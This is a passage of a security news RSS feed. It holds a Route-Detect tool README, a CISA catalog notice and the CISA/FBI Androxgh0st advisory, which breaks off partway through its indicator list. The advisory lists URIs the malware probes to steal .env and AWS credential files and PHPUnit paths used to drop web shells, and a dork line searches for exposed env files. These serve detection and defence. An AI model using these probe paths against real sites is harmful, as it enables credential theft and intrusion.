<guid isPermaLink="true">https://tsecurity.de/de/2022967/sicherheitsluecken/laravel-env-file-access-open-directory/</guid>
<pubDate>Wed, 07 Feb 2024 22:53:27 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[intitle:"index of" env.cgi]]></content:encoded>
</item>
<item>
<title><![CDATA[Route-Detect - Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes]]></title>
<description><![CDATA[Find authentication (authn) and authorization (authz) security bugs in web application routes:    Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:    2021 OWASP Top 10 #1...]]></description>
<link>https://tsecurity.de/de/2008055/it-security-nachrichten/route-detect-find-authentication-authn-and-authorization-authz-security-bugs-in-web-application-routes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2008055/it-security-nachrichten/route-detect-find-authentication-authn-and-authorization-authz-security-bugs-in-web-application-routes/</guid>
<pubDate>Sat, 27 Jan 2024 14:23:18 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi8vFhQaV3b_MGZl4LxxZGap9qHbHzMAIXs8DfOeFi1Lbg-OD8fHo_lhhWfLCi1cWSgxZkttB0syNneo1MoqDM-9AAxtvyqgon0enm0grV6KtyYk4ChCTO0nxuynu5hNzniL1vMHv04bweUKdmeanTEIgaPFke8LHBnmm_nhA1YbwAlgQ9hgddIdFfB2alq"><img alt="" border="0" height="332" src="https://blogger.googleusercontent.com/img/a/AVvXsEi8vFhQaV3b_MGZl4LxxZGap9qHbHzMAIXs8DfOeFi1Lbg-OD8fHo_lhhWfLCi1cWSgxZkttB0syNneo1MoqDM-9AAxtvyqgon0enm0grV6KtyYk4ChCTO0nxuynu5hNzniL1vMHv04bweUKdmeanTEIgaPFke8LHBnmm_nhA1YbwAlgQ9hgddIdFfB2alq=w640-h332" width="640"></a></p><div><br></div><p dir="auto"></p>  <p dir="auto">Find authentication (authn) and <a href="https://www.kitploit.com/search/label/Authorization" target="_blank" title="authorization">authorization</a> (authz) security bugs in web application routes:</p>  <span><a name="more"></a></span><p align="center" dir="auto"><br></p>  <p dir="auto">Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources <a href="https://www.kitploit.com/search/label/Highlight" target="_blank" title="highlight">highlight</a> the severity of the issue:</p>  <ul dir="auto">  <li>2021 <a href="https://www.kitploit.com/search/label/OWASP%20Top%2010" target="_blank" title="OWASP Top 10">OWASP Top 10</a> #1 - <a href="https://owasp.org/Top10/A01_2021-Broken_Access_Control/" rel="nofollow" target="_blank" title="Broken Access Control">Broken Access Control</a></li>  <li>2021 OWASP Top 10 #7 - <a href="https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/" rel="nofollow" target="_blank" title="Identification and">Identification and </a><a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="Authentication">Authentication</a> Failures (formerly Broken Authentication)</li>  <li>2023 OWASP API Top 10 #1 - <a href="https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/" rel="nofollow" target="_blank" title="Broken Object Level Authorization">Broken Object Level Authorization</a></li>  <li>2023 OWASP API Top 10 #2 - <a href="https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/" rel="nofollow" target="_blank" title="Broken Authentication">Broken Authentication</a></li>  <li>2023 OWASP API Top 10 #5 - <a href="https://owasp.org/API-Security/editions/2023/en/0xa5-broken-function-level-authorization/" rel="nofollow" target="_blank" title="Broken Function Level Authorization">Broken Function Level Authorization</a></li>  <li>2023 CWE Top 25 #11 - <a href="https://cwe.mitre.org/top25/archive/2023/2023_top25_list.html" rel="nofollow" target="_blank" title="CWE-862: Missing Authorization">CWE-862: Missing Authorization</a></li>  <li>2023 CWE Top 25 #13 - <a href="https://cwe.mitre.org/top25/archive/2023/2023_top25_list.html" rel="nofollow" target="_blank" title="CWE-287: Improper Authentication">CWE-287: Improper Authentication</a></li>  <li>2023 CWE Top 25 #20 - <a href="https://cwe.mitre.org/top25/archive/2023/2023_top25_list.html" rel="nofollow" target="_blank" title="CWE-306: Missing Authentication for Critical Function">CWE-306: Missing Authentication for Critical Function</a></li>  <li>2023 CWE Top 25 #24 - <a href="https://cwe.mitre.org/top25/archive/2023/2023_top25_list.html" rel="nofollow" target="_blank" title="CWE-863: Incorrect Authorization">CWE-863: Incorrect Authorization</a></li>  </ul>  <p dir="auto">Supported web <a href="https://www.kitploit.com/search/label/Frameworks" target="_blank" title="frameworks">frameworks</a> (<code>route-detect</code> IDs in parentheses):</p>  <ul dir="auto">  <li>Python: Django (<code>django</code>, <code>django-rest-framework</code>), Flask (<code>flask</code>), Sanic (<code>sanic</code>)</li>  <li>PHP: Laravel (<code>laravel</code>), Symfony (<code>symfony</code>), CakePHP (<code>cakephp</code>)</li>  <li>Ruby: Rails* (<code>rails</code>), Grape (<code>grape</code>)</li>  <li>Java: JAX-RS (<code>jax-rs</code>), Spring (<code>spring</code>)</li>  <li>Go: Gorilla (<code>gorilla</code>), Gin (<code>gin</code>), Chi (<code>chi</code>)</li>  <li>JavaScript/TypeScript: Express (<code>express</code>), React (<code>react</code>), Angular (<code>angular</code>)</li>  </ul>  <p dir="auto">*<em>Rails support is limited. Please see <a data-hovercard-type="issue" data-hovercard-url="/mschwager/route-detect/issues/8/hovercard" href="https://github.com/mschwager/route-detect/issues/8" rel="nofollow" target="_blank" title="this issue">this issue</a> for more information.</em></p>  <h1 dir="auto" tabindex="-1">Installing</h1>  <p dir="auto">Use <code>pip</code> to install <code>route-detect</code>:</p>  <div><pre><code>$ python -m pip install --upgrade route-detect<br></code></pre></div>  <p dir="auto">You can check that <code>route-detect</code> is installed correctly with the following command:</p>  <div><pre><code>$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -<br>Scanning 1 file.<br><br>Findings:<br><br>  /tmp/stdin<br>     routes.rules.test-route-detect<br>        Found '1 == 1', your route-detect installation is working correctly<br><br>          1â”† print(1 == 1)<br><br><br>Ran 1 rule on 1 file: 1 finding.<br></code></pre></div>  <h1 dir="auto" tabindex="-1">Using</h1>  <p dir="auto"><code>route-detect</code> provides the <code>routes</code> CLI command and uses <a href="https://github.com/returntocorp/semgrep" rel="nofollow" target="_blank" title="Find authentication (authn) and authorization (authz) security bugs in web application routes. (21)"><code>semgrep</code></a> to search for routes.</p>  <p dir="auto">Use the <code>which</code> subcommand to point <code>semgrep</code> at the correct web application rules:</p>  <div><pre><code>$ semgrep --config $(routes which django) path/to/django/code<br></code></pre></div>  <p dir="auto">Use the <code>viz</code> subcommand to visualize route information in your browser:</p>  <div><pre><code>$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code<br>$ routes viz --browser routes.json<br></code></pre></div>  <p dir="auto">If you're not sure which framework to look for, you can use the special <code>all</code> ID to check everything:</p>  <div><pre><code>$ semgrep --json --config $(routes which all) --output routes.json path/to/code<br></code></pre></div>  <p dir="auto">If you have custom authn or authz logic, you can copy <code>route-detect</code>'s rules:</p>  <div><pre><code>$ cp $(routes which django) my-django.yml<br></code></pre></div>  <p dir="auto">Then you can modify the rule as necessary and run it like above:</p>  <div><pre><code>$ semgrep --json --config my-django.yml --output routes.json path/to/django/code<br>$ routes viz --browser routes.json<br></code></pre></div>  <h1 dir="auto" tabindex="-1">Contributing</h1>  <p dir="auto"><code>route-detect</code> uses <a href="https://python-poetry.org/" rel="nofollow" target="_blank" title="Find authentication (authn) and authorization (authz) security bugs in web application routes. (22)"><code>poetry</code></a> for dependency and configuration management.</p>  <p dir="auto">Before proceeding, install project dependencies with the following command:</p>  <div><pre><code>$ poetry install --with dev<br></code></pre></div>  <h2 dir="auto" tabindex="-1">Linting</h2>  <p dir="auto">Lint all project files with the following command:</p>  <div><pre><code>$ poetry run pre-commit run --all-files<br></code></pre></div>  <h2 dir="auto" tabindex="-1">Testing</h2>  <p dir="auto">Run Python tests with the following command:</p>  <div><pre><code>$ poetry run pytest --cov<br></code></pre></div>  <p dir="auto">Run Semgrep rule tests with the following command:</p>  <div><pre><code>$ poetry run semgrep --test --config routes/rules/ tests/test_rules/<br></code></pre></div>  <br><br><div><b><span><a class="kiploit-download" href="https://github.com/mschwager/route-detect" rel="nofollow" target="_blank" title="Download Route-Detect">Download Route-Detect</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Adds One Known Exploited Vulnerability to Catalog]]></title>
<description><![CDATA[CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
CVE-2018-15133 Laravel Deserialization of Untrusted Data Vulnerability
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose sign...]]></description>
<link>https://tsecurity.de/de/1993170/it-security-nachrichten/cisa-adds-one-known-exploited-vulnerability-to-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1993170/it-security-nachrichten/cisa-adds-one-known-exploited-vulnerability-to-catalog/</guid>
<pubDate>Tue, 16 Jan 2024 17:52:11 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>CISA has added one new vulnerability to its <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities Catalog</a>, based on evidence of active exploitation.</p>
<ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-15133" rel="noreferrer noopener" target="_blank" title="Laravel Deserialization of Untrusted Data Vulnerability">CVE-2018-15133</a> Laravel Deserialization of Untrusted Data Vulnerability</li>
</ul><p>These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. </p>
<p><a href="https://www.cisa.gov/binding-operational-directive-22-01" title="Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities">Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities</a> established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the<a> </a><a href="https://www.cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf" title="BOD 22-01 Fact Sheet">BOD 22-01 Fact Sheet</a> for more information.</p>
<p>Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Catalog vulnerabilities">Catalog vulnerabilities</a> as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the <a href="https://www.cisa.gov/known-exploited-vulnerabilities" title="specified criteria">specified criteria</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA and FBI Release Known IOCs Associated with Androxgh0st Malware]]></title>
<description><![CDATA[Today, CISA and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA), Known Indicators of Compromise Associated with Androxgh0st Malware, to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat a...]]></description>
<link>https://tsecurity.de/de/1993083/it-security-nachrichten/cisa-and-fbi-release-known-iocs-associated-with-androxgh0st-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1993083/it-security-nachrichten/cisa-and-fbi-release-known-iocs-associated-with-androxgh0st-malware/</guid>
<pubDate>Tue, 16 Jan 2024 17:06:32 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Today, CISA and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA), <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a" title="Known Indicators of Compromise Associated with Androxgh0st Malware">Known Indicators of Compromise Associated with Androxgh0st Malware</a>, to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware.</p>
<p>Androxgh0st malware establishes a botnet for victim identification and exploitation in vulnerable networks, and targets files that contain confidential information, such as credentials, for various high profile applications. Threat actors deploying Androxgh0st malware have been observed exploiting specific vulnerabilities which could lead to remote code execution, including:</p>
<ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9841" title="CVE-2017-9841">CVE-2017-9841</a> (PHP Unit Command)</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-41773" title="CVE-2021-41773">CVE-2021-41773</a> (Apache HTTP Server versions), and</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-15133" title="CVE-2018-15133">CVE-2018-15133</a> (Laravel applications).</li>
</ul><p>In response, CISA is adding these CVEs to its <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities Catalog</a>.</p>
<p>CISA and FBI encourage organizations to review and implement the mitigations found in the joint CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st malware. For more information, visit CISA's <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/malware-phishing-and-ransomware" title="Malware, Phishing, and Ransomware">Malware, Phishing, and Ransomware</a> page.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Known Indicators of Compromise Associated with Androxgh0st Malware]]></title>
<description><![CDATA[SUMMARY
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors...]]></description>
<link>https://tsecurity.de/de/1993012/sicherheitsluecken/known-indicators-of-compromise-associated-with-androxgh0st-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1993012/sicherheitsluecken/known-indicators-of-compromise-associated-with-androxgh0st-malware/</guid>
<pubDate>Tue, 16 Jan 2024 16:24:27 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3><strong>SUMMARY</strong></h3>
<p>The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.</p>
<p>The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.</p>
<p>Download the PDF version of this report:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2024-01/aa24-016a-known-indicators-of-compromise-associated-with-adroxgh0st-malware.pdf" class="c-file__link" target="_blank">AA24-016A Known Indicators of Compromise Associated with Androxgh0st Malware</a>
    <span class="c-file__size">(PDF,       569.31 KB
  )</span>
  </div>
</div>
<h3><strong>TECHNICAL DETAILS</strong></h3>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK<sup>®</sup> for Enterprise</a> framework, version 14. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
<h4><strong>Overview</strong></h4>
<p>Androxgh0st malware has been observed establishing a botnet [<a href="https://attack.mitre.org/versions/v14/techniques/T1583/005/" title="Acquire Infrastructure: Botnet">T1583.005</a>] for victim identification and exploitation in target networks. According to open source reporting[<a href="https://fortiguard.fortinet.com/threat-signal-report/5066/androxgh0st-malware-actively-used-in-the-wild" title="AndroxGh0st Malware Actively Used in the Wild">1</a>], Androxgh0st is a Python-scripted malware [<a href="https://attack.mitre.org/versions/v14/techniques/T1059/006/" title="Command and Scripting Interpreter: Python">T1059.006</a>] primarily used to target .env files that contain confidential information, such as credentials [<a href="https://attack.mitre.org/versions/v14/techniques/T1552/001/" title="Unsecured Credentials: Credentials In Files">T1552.001</a>] for various high profile applications (i.e., Amazon Web Services [AWS], Microsoft Office 365, SendGrid, and Twilio from the Laravel web application framework). Androxgh0st malware also supports numerous functions capable of abusing the Simple Mail Transfer Protocol (SMTP), such as scanning [<a href="https://attack.mitre.org/versions/v14/techniques/T1046/" title="Network Service Discovery">T1046</a>] and exploiting exposed credentials [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a>] and application programming interfaces (APIs) [<a href="https://attack.mitre.org/versions/v14/techniques/T1114/" title="Email Collection">T1114</a>], and web shell deployment [<a href="https://attack.mitre.org/versions/v14/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>].</p>
<h4><strong>Targeting the PHPUnit</strong></h4>
<p>Androxgh0st malware TTPs commonly involves the use of scripts, conducting scanning [<a href="https://attack.mitre.org/versions/v14/techniques/T1595/" title="Active Scanning">T1595</a>] and searching for websites with specific vulnerabilities. In particular, threat actors deploying Androxgh0st have been observed exploiting <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9841" title="CVE-2017-9841">CVE-2017-9841</a> to remotely run hypertext preprocessor (PHP) code on fallible websites via PHPUnit [<a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>]. Websites using the PHPUnit module that have internet-accessible (exposed) <code>/vendor</code> folders are subject to malicious <code>HTTP POST</code> requests to the <code>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code> uniform resource identifier (URI). This PHP page runs PHP code submitted through a POST request, which allows the threat actors to remotely execute code.</p>
<p>Malicious actors likely use Androxgh0st to download malicious files [<a href="https://attack.mitre.org/versions/v14/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>] to the system hosting the website. Threat actors are further able to set up a fake (illegitimate) page accessible via the URI to provide backdoor access to the website. This allows threat actors to download additional malicious files for their operations and access databases.</p>
<h4><strong>Laravel Framework Targeting</strong></h4>
<p>Androxgh0st malware establishes a botnet to scan for websites using the Laravel web application framework. After identifying websites using the Laravel web application, threat actors attempt to determine if the domain’s root-level <code>.env</code> file is exposed and contains credentials for accessing additional services. <strong>Note:</strong> <code>.env</code> files commonly store credentials and tokens. Threat actors often target <code>.env</code> files to steal these credentials within the environment variables.</p>
<p>If the <code>.env</code> file is exposed, threat actors will issue a GET request to the <code>/.env</code> URI to attempt to access the data on the page. Alternatively, Androxgh0st may issue a POST request to the same URI with a POST variable named <code>0x[]</code> containing certain data sent to the web server. This data is frequently used as an identifier for the threat actor. This method appears to be used for websites in debug mode (i.e., when non-production websites are exposed to the internet). A successful response from either of these methods allows the threat actors to look for usernames, passwords, and/or other credentials pertaining to services such as email (via SMTP) and AWS accounts.</p>
<p>Androxgh0st malware can also access the application key [<a href="https://attack.mitre.org/versions/v14/tactics/TA0006/" title="Credential Access">TA0006</a>] for the Laravel application on the website. If the threat actors successfully identify the Laravel application key, they will attempt exploitation by using the key to encrypt PHP code [<a href="https://attack.mitre.org/versions/v13/techniques/T1027/010/" title="Obfuscated Files or Information: Command Obfuscation">T1027.010</a>]. The encrypted code is then passed to the website as a value in the cross-site forgery request (XSRF) token cookie, <code>XSRF-TOKEN</code>, and included in a future GET request to the website. The vulnerability defined in <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-15133" title="CVE-2018-15133">CVE-2018-15133</a> indicates that on Laravel applications, XSRF token values are subject to an un-serialized call, which can allow for remote code execution. In doing so, the threat actors can upload files to the website via remote access.</p>
<h4><strong>Apache Web Server Targeting</strong></h4>
<p>In correlation with <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-41773" title="CVE-2021-41773">CVE-2021-41773</a>, Androxgh0st<em> </em>actors have been observed scanning vulnerable web servers [<a href="https://attack.mitre.org/versions/v14/techniques/T1595/002/" title="Active Scanning: Vulnerability Scanning">T1595.002</a>] running Apache HTTP Server versions 2.4.49 or 2.4.50. Threat actors can identify uniform resource locators (URLs) for files outside root directory through a path traversal attack [<a href="https://attack.mitre.org/versions/v14/techniques/T1083/" title="File and Directory Discovery">T1083</a>]. If these files are not protected by the “request all denied” configuration and Common Gateway Interface (CGI) scripts are enabled, this may allow for remote code execution.</p>
<p>If threat actors obtain credentials for any services using the above methods, they may use these credentials to access sensitive data or use these services to conduct additional malicious operations. For example, when threat actors successfully identify and compromise AWS credentials from a vulnerable website, they have been observed attempting to create new users and user policies [<a href="https://attack.mitre.org/versions/v14/techniques/T1136/" title="Create Account">T1136</a>]. Additionally, Andoxgh0st actors have been observed creating new AWS instances to use for conducting additional scanning activity [<a href="https://attack.mitre.org/versions/v14/techniques/T1583/006/" title="Acquire Infrastructure: Web Services">T1583.006</a>].</p>
<h3><strong>INDICATORS OF COMPROMISE (IOCs)</strong></h3>
<p>Based on investigations and analysis, the following requests are associated with Androxgh0st activity:</p>
<ul><li>Incoming GET and POST requests to the following URIs:
<ul><li><code>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/.env</code></li>
</ul></li>
<li>Incoming POST requests with the following strings:
<ul><li><code>[0x%5B%5D=androxgh0st]</code></li>
<li><code>ImmutableMultiDict([('0x[]', 'androxgh0st')])</code></li>
</ul></li>
</ul><p>In both previously listed POST request strings, the name <code>androxgh0st</code> has been observed to be replaced with other monikers.</p>
<p>Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include:</p>
<ul><li><code>/info</code></li>
<li><code>/phpinfo</code></li>
<li><code>/phpinfo.php</code></li>
<li><code>/?phpinfo=1</code></li>
<li><code>/frontend_dev.php/$</code></li>
<li><code>/_profiler/phpinfo</code></li>
<li><code>/debug/default/view?panel=config</code></li>
<li><code>/config.json</code></li>
<li><code>/.json</code></li>
<li><code>/.git/config</code></li>
<li><code>/live_env</code></li>
<li><code>/.env.dist</code></li>
<li><code>/.env.save</code></li>
<li><code>/environments/.env.production</code></li>
<li><code>/.env.production.local</code></li>
<li><code>/.env.project</code></li>
<li><code>/.env.development</code></li>
<li><code>/.env.production</code></li>
<li><code>/.env.prod</code></li>
<li><code>/.env.development.local</code></li>
<li><code>/.env.old</code></li>
<li><code>/<insert-directory>/.env </insert-directory></code>
<ul><li><strong>Note: </strong>the actor may attempt multiple different potential URI endpoints scanning for the <code>.env</code> file, for example <code>/docker/.env or /local/.env</code>.</li>
</ul></li>
<li><code>/.aws/credentials</code></li>
<li><code>/aws/credentials</code></li>
<li><code>/.aws/config</code></li>
<li><code>/.git</code></li>
<li><code>/.test</code></li>
<li><code>/admin</code></li>
<li><code>/backend</code></li>
<li><code>/app</code></li>
<li><code>/current</code></li>
<li><code>/demo</code></li>
<li><code>/api</code></li>
<li><code>/backup</code></li>
<li><code>/beta</code></li>
<li><code>/cron</code></li>
<li><code>/develop</code></li>
<li><code>/Laravel</code></li>
<li><code>/laravel/core</code></li>
<li><code>/gists/cache</code></li>
<li><code>/test.php</code></li>
<li><code>/info.php</code></li>
<li><code>//.env</code></li>
<li><code>/admin-app/.env%20</code></li>
<li><code>/laravel/.env%20</code></li>
<li><code>/shared/.env%20</code></li>
<li><code>/.env.project%20</code></li>
<li><code>/apps/.env%20</code></li>
<li><code>/development/.env%20</code></li>
<li><code>/live_env%20</code></li>
<li><code>/.env.development%20</code></li>
</ul><h5><strong>Targeted URIs for web-shell drop:</strong></h5>
<ul><li><code>/.env/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//lib/phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>//lib/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//lib/phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>//new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>//phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>//protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/evalstdin.php</code></li>
<li><code>//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//vendor/phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>//vendor/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//vendor/phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>//www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php</code></li>
<li><code>/lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/lib/phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>/lib/phpunit/phpunit/Util/PHP/eval</code></li>
<li><code>stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/lib/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/lib/phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>/phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/evalstdin.php</code></li>
<li><code>/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>./phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>/phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.dev</code></li>
<li><code>/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/vendor/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/vendor/phpunit/Util/PHP/eval-stdin.php</code></li>
<li><code>/vendor/phpunit/Util/PHP/eval-stdin.php%20</code></li>
<li><code>/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
<li><code>/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
